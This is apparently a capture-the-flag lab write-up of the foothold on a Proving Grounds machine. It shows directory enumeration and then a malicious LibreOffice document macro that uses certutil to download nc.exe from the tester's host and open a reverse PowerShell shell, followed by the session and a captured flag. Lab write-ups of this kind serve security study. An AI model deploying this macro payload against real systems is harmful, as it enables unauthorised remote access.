Foothold
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 100 -u http://192.168.190.169/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.190.169/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 304]
/index.php (Status: 200) [Size: 9635]
/uploads (Status: 301) [Size: 344] [--> http://192.168.190.169/uploads/]
/assets (Status: 301) [Size: 343] [--> http://192.168.190.169/assets/]
/upload.php (Status: 200) [Size: 537]
/css (Status: 301) [Size: 340] [--> http://192.168.190.169/css/]
/Index.php (Status: 200) [Size: 9635]
/js (Status: 301) [Size: 339] [--> http://192.168.190.169/js/]
/examples (Status: 503) [Size: 404]
/licenses (Status: 403) [Size: 423]
/%20 (Status: 403) [Size: 304]
/Assets (Status: 301) [Size: 343] [--> http://192.168.190.169/Assets/]
/INDEX.php (Status: 200) [Size: 9635]
Install dependencies
$ python3 badodt.py
Traceback (most recent call last):
File "/home/adot/oscp/pg/craft/badodt.py", line 6, in <module>
import ezodf
ModuleNotFoundError: No module named 'ezodf'
$ pip3 install ezodf
Defaulting to user installation because normal site-packages is not writeable
Collecting ezodf
Downloading ezodf-0.3.2.tar.gz (125 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 125.9/125.9 kB 1.4 MB/s eta 0:00:00
Preparing metadata (setup.py) ... done
Building wheels for collected packages: ezodf
Building wheel for ezodf (setup.py) ... done
Created wheel for ezodf: filename=ezodf-0.3.2-py2.py3-none-any.whl size=49000 sha256=a93840c81ae1b63abd637c5d38a4742dade4ab8c7bcb33dfa94db5ea4d97fc92
Stored in directory: /home/adot/.cache/pip/wheels/bb/23/3b/cce8669e20fa103fa8cd5d060b7e63ebb93cfbebd29a9e5d43
Successfully built ezodf
Installing collected packages: ezodf
Successfully installed ezodf-0.3.2
$ sudo responder -I tun0 -AVerify
Forgot we can't really do much with the NTLMv2 hash since SMB is closed on the machine... so we follow this guide instead
Sub Main
shell("cmd /c certutil.exe -urlcache -f http://192.168.45.239/nc.exe C:\programdata\nc.exe")
shell("C:\programdata\nc.exe 192.168.45.239 1337 -e powershell.exe")
End Sub$ nc -lnvp 1337$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.190.169] 49872
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Program Files\LibreOffice\program> whoami
whoami
craft\thecybergeek
PS C:\Program Files\LibreOffice\program> type C:\Users\thecybergeek\Desktop\local.txt
type C:\Users\thecybergeek\Desktop\local.txt
e333f88e0aab5ee87441ab456962125d
PS C:\Program Files\LibreOffice\program> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::8d35:9224:7b42:3ef8%5
IPv4 Address. . . . . . . . . . . : 192.168.190.169
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.190.254
PS C:\Program Files\LibreOffice\program>
Last updated
